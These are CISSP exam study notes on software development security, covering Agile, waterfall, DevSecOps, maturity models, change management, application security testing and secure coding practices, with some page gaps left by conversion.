Agile was started by 17 pioneers in 2001, producing the "Manifesto for Agile Software
Development" (agilemanifesto.org) that lays out the core philosophy of the Agile approach:
individuals and interactions over processes and tools
working software over comprehensive documentation
customer collaboration over contract negotiation
responding to change over following a plan
Agile Manifesto also defines 12 principles:
the highest priority is to satisfy the customer through early and continuous delivery of
valuable software
welcome changing requirements, even late in development; Agile processes harness change
for the customerʼs competitive advantage
deliver working software frequently, from a couple of weeks to a couple of months, with a
preference for the shorter timescale
business people and developers must work together daily throughout the project
build projects around motivated individuals; give them the environment, support, and tools
and trust them to build
emphasizing face-to-face conversation
working software is the primary measure of progress
agile processes promote sustainable development; the them should be able to maintain a
constant pace indefinitely
continuous attention to technical excellence and good design enhances agility
simplicity, or the art of maximizing the amount of work not done, is essential
the best architectures, requirements, and designs emerge from self-organizing teams
at regular intervals, the team reviews their effective and adjusts for improvement
Several methodologies have emerged that take these Agile principles and define specific processes
around them:
Scrum: a management framework that teams use to self-organize and work towards a
common goal; it describes a set of meetings, tools, and roles for efficient project delivery,
allowing teams to self-manage, learn from experience, and adapt to change; named from the
daily team meetings, called scrums; development focuses on short sprints that deliver
finished products; integrated product teams (IPTs) were an early effort of this approach
Kanban: a visual system used to manage and keep track of work as it moves through a
process; the word kanban is Japanese for "card you can see"; Kanban teams focus on
reducing the time a project (or user story) takes from start to finish, using a kanban board
and continuously improving their flow of work
Rapid Application Development (RAD): an agile software development approach that
focuses more on ongoing software projects and user feedback and less on following a strict
plan, emphasizing rapid prototyping over planning; RAD uses four phases: requirements
planning, user design, construction, and cutover
Rational Unified Process (RUP): an agile software development methodology that splits the
project life cycle into four phases:
inception: which defines the scope of the project and develop business case
elaboration: Plan project, specify features, and baseline the architecture
construction: Building the product
transition: providing the product to its users
during each of the phases, all six core development disciplines take place: business
modeling, requirements, analysis and design, implementation, testing, and deployment
164 / 175
2025-CISSP-Domain-Objectives.MD 2025-06-11
Agile Unified Process (AUP): a simplified version of the rational unified process, it
describes a simple, easy to understand approach to developing business application
software using agile techniques and concepts yet still remaining true to the RUP
Dynamic Systems Development Model (DSDM): an agile project delivery framework,
initially used as a software development method; key principles:
focus on the business need: DSDM teams establish a valid business case and ensure
organizational support throughout the project
deliver on time: work should be time-boxed and predictable, to build confidence in the
development team
Extreme Programming (XP): an Agile project management methodology that targets speed
and simplicity with short development cycles, using five guiding values, and five rules; the
goal of the rigid structure, focused sprints and continuous integrations is higher quality
product
Scaled Agile Framework® (SAFe): a set of org and workflow patterns for implementing
agile practices at an enterprise scale; the framework is a body of knowledge that includes
structured guidance on roles and responsibilities, how to plan and manage the work, and
values to uphold
Scaled Agile Framework: agile methodology applied to large orgs; allows large organizations with
multiple teams to coordinate, collaborate, and deliver products
Waterfall:
A linear approach to development, where each phase needs to be completed fully before the next
one begins (e.g. water only flows downhill or in one direction); developed by Winston Royce in
1970, the waterfall model uses a linear sequential life-cycle approach; all project requirements are
gathered up front, and there is no formal way to integrate changes as more information becomes
available
Traditional model has 7 stages, as each stage is completed, the project moves into the next phase;
the iterative waterfall model does allow development to return to the previous phase to correct
defects
System requirements
Software requirements
Preliminary design
Detailed design
Code and debug
Testing
Operations and maintenance
A major criticism of this model is that it's very rigid, and not ideal for most complex projects which
often contain many variables that affect the scope throughout the project's lifecycle
Spiral model: improved waterfall dev process providing for a cycle of Plan, Do, Check, Act (PDCA) sub-
stages at each phase of the SDLC; a risk-driven development process that follows an iterative model
while also including waterfall elements
following defined phases to completion and then repeats the process, resembling a spiral
the spiral model provides a solution to the major criticism of the waterfall model in that it allows
devs to return to planning stages as technical demands and customer requirements iterate
DevOps (Development and Operations): an approach to software development, quality assurance, and
technology operations that unites siloed staff, and bring the three functions together in a single
operational model; DevOps goal is to shorten the systems development lifecycle and provide continuous
delivery
closely aligned with lean and the Agile development approach, DevOps aims to dramatically
decrease the time required to develop, test, and deploy software changes
using the DevOps model, and continuous integration/continuous delivery (CI/CD), orgs strive to roll
out code dozens or even hundreds of times per day
165 / 175
2025-CISSP-Domain-Objectives.MD 2025-06-11
this requires a high degree of automation, including integrating code repositories, the software
configuration management process, and the movement of code between development, testing and
production environments
the tight integration of development and operations also calls for the simultaneous integration of
security controls
security must be tightly integrated and move with the same agility
DevSecOps: refers to the integration of development, security, and operations; extends DevOps by
integrating security practices
provides for a merger of phased review (as in the waterfall SDLC) with the DevOps method, to
incorporate the needs for security, safety, resilience or other emerging properties in the final
system, at each turn of the cycle of development
DevSecOps supports the concept of software-defined security, where security controls are actively
managed into the CI/CD pipeline
8.1.2 Maturity models (e.g., Capability Maturity Model (CMM), Software Assurance Maturity Model (SAMM))
Maturity models help software organizations improve the maturity and quality of their software processes
by implementing an evolutionary path from ad hoc, chaotic processes to mature, disciplined processes
NOTE: be able to describe the SW-CMM, IDEAL, and SAMM models
Software Engineering Institute (SEI) (Carnegie Mellon University) created the Capability Maturity Model
for Software (AKA Software Capability Maturity Model, abbreviated SW-CMM, CMM, or SCMM)
SW-CMM: a management process to foster the ongoing and continuous improvement of an org's
processes and workflows for developing, maintaining and using software
all software development moves through a set of maturity phases in sequential fashion, and CMM
describes the principles and practices underlying software process maturity, intended to help
improve the maturity and quality of software processes
note that CMM doesn't explicitly address security
stages of the CMM:
Level 1: Initial: process is disorganized; usually little or no defined software development
process
no KPIs
processes are ad-hoc, and immature
no basis for predicting project quality, time to completion etc
limited project management
limited software dev tools or automation
highly dependent on individual's skills and knowledge
Level 2: Repeatable: in this phase, basic lifecycle management processes are introduced
focus on establishing basic project management policies
project planning
configuration management
requirements management
sub-contract management
software quality assurance
Level 3: Defined: in this phase, software devs operate according to a set of formal,
documented software development processes; marked by the presence of basic lifecycle
management processes and reuse of code; includes the use of requirements management,
software project planning, quality assurance, and configuration management
documentation of standard guidelines and procedures takes place
peer reviews
166 / 175
2025-CISSP-Domain-Objectives.MD 2025-06-11
intergroup coordination
org process definition
org process focus
training programs
Level 4: Managed: in this phase, there is better management of the software process;
characterized by the use of quantitative software development measures
quantitative goals are set for software products and process
software quality management
quantitative management
Level 5: Optimizing: in this phase continuous improvement occurs
process change management
technology change management
defect prevention
Software Assurance Maturity Model (SAMM): an open source project maintained by the Open Web
Application Security Project (OWASP)
provides a framework for integrating security into the software development and maintenance
processes and provides orgs with the ability to assess their maturity
SAMM associates software development with 5 business functions:
Governance: the activities needed to manage software development processes
this function includes practices for:
strategy
metrics
policy
compliance
education
guidance
Design: process used to define software requirements and develop software
this function includes practices for:
threat modeling
threat assessment
security requirements
security architecture
Implementation: process of building and deploying software components and managing
flaws
this function includes:
secure build
secure deployment
defect management practices
Verification: activities undertaken to confirm code meets business and security requirements
this function includes:
architecture assessment
requirements-driven testing
security testing
Operations: actions taken to maintain security throughout the software lifecycle after code is
released
function includes:
incident management
environment management
operational management
167 / 175
2025-CISSP-Domain-Objectives.MD 2025-06-11
IDEAL Model: developed by SEI, a model for software development that uses many of the SW-CMM
attributes, using 5 phases:
Initiating: business reasons for the change are outlined, support is built, and applicable
infrastructure is allocated
Diagnosing: in this phase, engineers analyze the current state of the org and make general
recommendations for change
Establishing: development of a specific plan of action based on the diagnosing phase
recommendations
Acting: in this phase, the org develops solutions and then tests, refines, and implements them
Learning: continuously analyze efforts to achieve these goals, and propose new actions as required
IDEAL vs SW-CMM:
IDEAL SW-CMM
Initiating Initial
Diagnosing Repeatable
Establishing Defined
Acting Managed
Learning Optimizing
8.1.3 Operations and maintenance
Once delivered to the production environment, software devs must make any additional changes to
accommodate unexpected bugs, vulnerabilities, or interoperability issues
They must also keep pace with changing business processes, and work closely with the operations team
(typically IT), to ensure reliable operations
together, ops and development transition a new system to production and management of the
system's config
The dev team must continually provide hotfixes, patches, and new releases to address discovered
security issues and identified coding errors
8.1.4 Change management
Change management (AKA control management) plays an important role when monitoring systems in a
controlled environment, and has 3 basic components:
Request Control: process that provides an organized framework within which users can request
modifications, managers can conduct cost/benefit analysis, and developers can prioritize tasks
Change Control: the process of controlling specific changes that need to take place during the life
cycle of a system, serving to document the necessary change-related activities; or the process of
providing an organized framework within which multiple devs can create and test a solution prior to
rolling it out in a production environment
where change management is the project managerʼs responsibility for the overarching
process, change control is what devs do to ensure the software or environment doesnʼt
break when changed
change control is basically the process used by devs to re-create a situation encountered by
a user and analyze the appropriate changes; it provides a framework where multiple devs
can create and test a solution prior to rolling it out into a prod environment
Release Control: once changes are finalized, they must be approved for release through the
release control procedure
168 / 175
2025-CISSP-Domain-Objectives.MD 2025-06-11
one of the responsibilities of release control is ensuring that the process includes
acceptance testing, confirming that any alterations to end-user work tasks are understood
and functional prior to code release
8.1.5 Integrated Product Team (IPT)
Integrated Product Team (IPT): Introduced by the US Department of Defense (DoD) as an approach to
bring together multifunctional teams with a single goal of delivering a product or developing a process or
policy, and fostering parallel, rather than sequential, decisions
Essentially, IPT is used to ensure that all aspects of a product, process, or policy are considered during
the development process
8.2 Identify and apply security controls in development ecosystems (OSG-10 Chpts
15,20,21)
Applications, including custom systems, can present significant risks and vulnerabilities, and to protect against
these it's important to introduce security controls into the entire systemʼs development lifecycle
8.2.1 Programming languages
Computers understand 1s and 0s (binary), and each CPU has its own (machine) language
Assembly language: a way of using mnemonics to represent the basic instruction set of a CPU
Assemblers: tools that convert assembly language source code into machine code
Third-generation programming languages, such as C/C++, Java, and Python, are known as high-level
languages
high-level languages allow developers to write instructions that better approximate human
communication
Compiled language: converts source code into machine-executable format
compiled code is generally less prone to manipulation by a third party, however easier to embed
backdoors or other security flaws without detection
Decompilers: convert binary executable back into source code
Disassemblers: convert back into machine-readable assembly language (an intermediate step during the
compilation process)
Interpreted language: uses an interpreter to execute; sourcecode is viewable; e.g. Python, R, JavaScript,
VBScript
Object-oriented programming (OOP): defines an object to be set of a software that offers one or more
methods, internal to the object, that software external to that object can request to access; each method
may require specific inputs and resources and may produce a specified set of outputs; focuses on the
objects involved in an interaction
OOP languages include C++, Java, and .NET
think of OOP as a group of objects that can be requested to perform certain operations or exhibit
certain behaviors, working together to provide a systemʼs functionality or capabilities
OOP has the potential to be more reliable and to reduce the propagation of program change errors,
and is better suited to modeling or mimicking the real world
each object in the OOP model has methods that correspond to specific actions that can be taken
on the object
objects can also be subclasses of other objects and inherit methods from their parent class; the
subclasses can use all the methods of the parent class and have additional class-specific methods
from a security standpoint, object-oriented programming provides a black-box approach to
abstraction
OOP terms:
message: a communication to or input of an object
method: internal code that defines the actions of an object
169 / 175
2025-CISSP-Domain-Objectives.MD 2025-06-11
170 / 175
2025-CISSP-Domain-Objectives.MD 2025-06-11
Continuous Integration and Continuous Delivery: workflow automation processes and tools that
attempt to reduce, if not eliminate, the need for manual communication and coordination between the
steps of a software development process
Continuous integration (CI): all new code is integrated into the rest of the system as soon as the
developer writes it, merging it into a shared repo
this merge triggers a batch of unit tests
if it merges without error, it's subjected to integration tests
CI improves software development efficiency by identifying errors early and often
CI also allows the practice of continuous delivery (CD)
Continuous Delivery (CD): incrementally building a software product that can be released at any time;
because all processes and tests are automated, code can be released to production daily or more often
CI/CD relies on automation and often third-party tools which can have vulnerabilities or be compromised
Secure practices such as threat modeling, least privilege, defense in depth, and zero trust can help
reduce possible threats to these tools and systems
8.2.7 Software Configuration Management
Software Configuration Management (SCM): a product that identifies the attributes of software at
various points in time and performs methodical change control for the purpose of maintaining software
integrity and traceability throughout the SDLC
SCM tracks config changes, and verifies that the delivered software includes all approved changes
SCM systems manage and track revisions made by multiple people against a single master
software repository, providing concurrency management, versioning, and synchronization
auditing and logging of software changes mitigates risk to the organization by:
providing a detailed record of all modifications made to software applications
allowing security teams to identify suspicious activity
quickly detect unauthorized changes and investigate potential security breaches
and take corrective actions, ultimately protecting the integrity and confidentiality of the org's
data and systems
8.2.8 Code repositories
Software development is a collaborative effort, and larger projects require teams of devs working
simultaneously on different parts
Code repositories support collaborations, acting as a central storage point for source code
github, bitbucket, and sourceforge are examples of systems that provide version control, bug
tracking, web hosting, release management, and communications functionality
8.2.9 Application security testing (e.g., static application security testing (SAST), dynamic application security
testing (DAST), software composition analysis, Interactive Application Security Test (IAST))
Static Application Security Testing (SAST): AKA static analysis, tools and technique to help identify
software defects (e.g. data type errors, loop/structure bounds violations, unreachable code) or security
policy violations and is carried out by examining the code without executing the program (or before the
program is compiled)
the term SAST is generally reserved for automated tools that assist analysts and developers,
whereas manual inspection by humans is generally referred to as code review
SAST allows devs to scan source code for flaws and vulns; it also provides a scalable method of
security code review and ensuring that devs are following secure coding policies
Dynamic Application Security Testing (DAST): AKA dynamic analysis, is the evaluation of a program
while running in real time
tools that execute the software unit, application or system under test, in ways that attempt to drive
it to reveal a potentially exploitable vulnerability
171 / 175
2025-CISSP-Domain-Objectives.MD 2025-06-11
DAST is usually performed once a program has cleared SAST and basic code flaws have been fixed
DAST enables devs to trace subtle logical errors that are likely to cause security problems, without
the need to create artificial error-inducing scenarios
dynamic analysis is also effective for compatibility testing, detecting memory leakages, identifying
dependencies, and analyzing software without accessing the softwareʼs actual source code
Interactive Application Security Testing (IAST): the combination of SAST and DAST such application
testing is done on the running system (DAST), with access to source code (SAST)
8.3 Assess the effectiveness of software security (OSG-10 Chpts 20,21)
8.3.1 Auditing and logging of changes
Applications should be configured to log details of errors and other security events to a centralized log
repository
The Open Web Application Security Project (OWASP) Secure Coding Practices suggest logging the
following events:
input validation failures
authentication attempts, especially failures
access control failures
tampering attempts
use of invalid or expired session tokens
exceptions raised by the OS or applications
use of admin privileges
Transport Layer Security (TLS) failures
cryptographic errors
8.3.2 Risk analysis and mitigation
Risk management is at the center of secure software development, in particular regarding the mapping of
identified risks and implemented controls
this is a difficult part of secure software dev, especially related to auditing
Threat modeling is important to dev teams, and particularly in DevSecOps
Assessors are also interested in the linkages between the software dev and risk management programs
software projects should be tracked in the orgʼs risk matrix, to ensure the dev team is connected to
the broader risk management efforts, and not working in isolation
8.4 Assess security impact of acquired software (OSG-10 Chpts 16,20)
8.4.1 Commercial-off-the-shelf (COTS)
Commercial Off-the-Shelf (COTS): software elements, usually apps, that are provided as finished
products (not intended for alteration by or for the end-user)
Most widely used commercial-off-the-shelf (COTS) software products have been security researcher
(both benign and malicious) tested
researching discovered vulnerabilities and exploits can help us understand how seriously the
vendor takes security
for niche products, you should research vendor certifications, such as ISO/IEC 27034 Application
Security
other than secure coding certification, you can look for overall information security management
system (ISMS) certifications such as ISO/IEC 27001 and FedRAMP (which are difficult to obtain, and
show that the vendor is serious about security)
If you can talk with a vendor, look for processes like defensive programming, which is a software
development best practice that means as code is developed or reviewed, they are constantly looking for
172 / 175
2025-CISSP-Domain-Objectives.MD 2025-06-11
173 / 175
2025-CISSP-Domain-Objectives.MD 2025-06-11
A source code vulnerability is a code defect providing a threat actor with an opportunity to compromise
the security of a software system
source code vulns are caused by design or implementation flaws
design flaw: if dev did everything correctly, there would still be a vulnerability
implementation flaw: dev incorrectly implemented part of a good design
the OWASP top 10 vulnerabilities for 2024:
Broken access control
Cryptographic failures
Injection
Insecure design
Security misconfiguration
Vulnerable and outdated components
Identification and authentication failures
Software and data integrity failures
Security logging and monitoring failures
Server Side Request Forgery (SSRF)
8.5.2 Security of Application Programming Interfaces (APIs)
Application Programming Interface (API): specifies the manner in which a software component
interacts with other components
API's reduce the effort of providing secure component interactions by providing easy
implementation for security controls
API's reduce code maintenance by encouraging software reuse, and keeping the location of
changes in one place
Parameter validation: ensuring that any API parameter is checked against being malformed,
invalid, or malicious helps ensure API secure use; validation confirms that the parameter values
being received by an app are within defined limits before they are processed by the system
8.5.3 Security coding practices
Secure coding practices can be summarized as standards and guidelines
standards: mandatory activities, actions, or rules
guidelines: recommended actions or ops guidelines that provide flexibility for unforeseen
circumstances
orgs greatly reduce source code vulns by enforcing secure coding standards and maintaining
coding guidelines that reflect best practices
To be considered a standard, coding practice must meet the following:
reduces the risk of a particular type of vuln
enforceable across all of an org's software development efforts
verifiably implemented
Note: secure coding standards, rigorously applied, is the best way to reduce source code vulns; coding
standards ensures devs always do certain things in a certain way, while avoiding others
Secure coding guidelines are recommended practices that tend to be less specific than standards
e.g. consistently formatted code comments, or keeping code functions short/tight
8.5.4 Software-defined security
Software-defined security (SDS or SDSec): a security model in which security functions such as
firewalling, IDS/IPS, and network segmentation are implemented in software within an SDN environment
one of the advantages of this approach is that sensors (for systems like IDS/IPS) can be
dynamically repositioned depending on the threat
174 / 175
2025-CISSP-Domain-Objectives.MD 2025-06-11
SDS provides a decoupling from physical devices, because it abstracts security functions into
software that can run on any compatible physical or virtual infrastructure, critical for supporting
cloud services dynamic scaling and virtualized data centers
DevSecOps supports the concept of software-defined security, where security controls are actively
managed into the CI/CD pipeline
175 / 175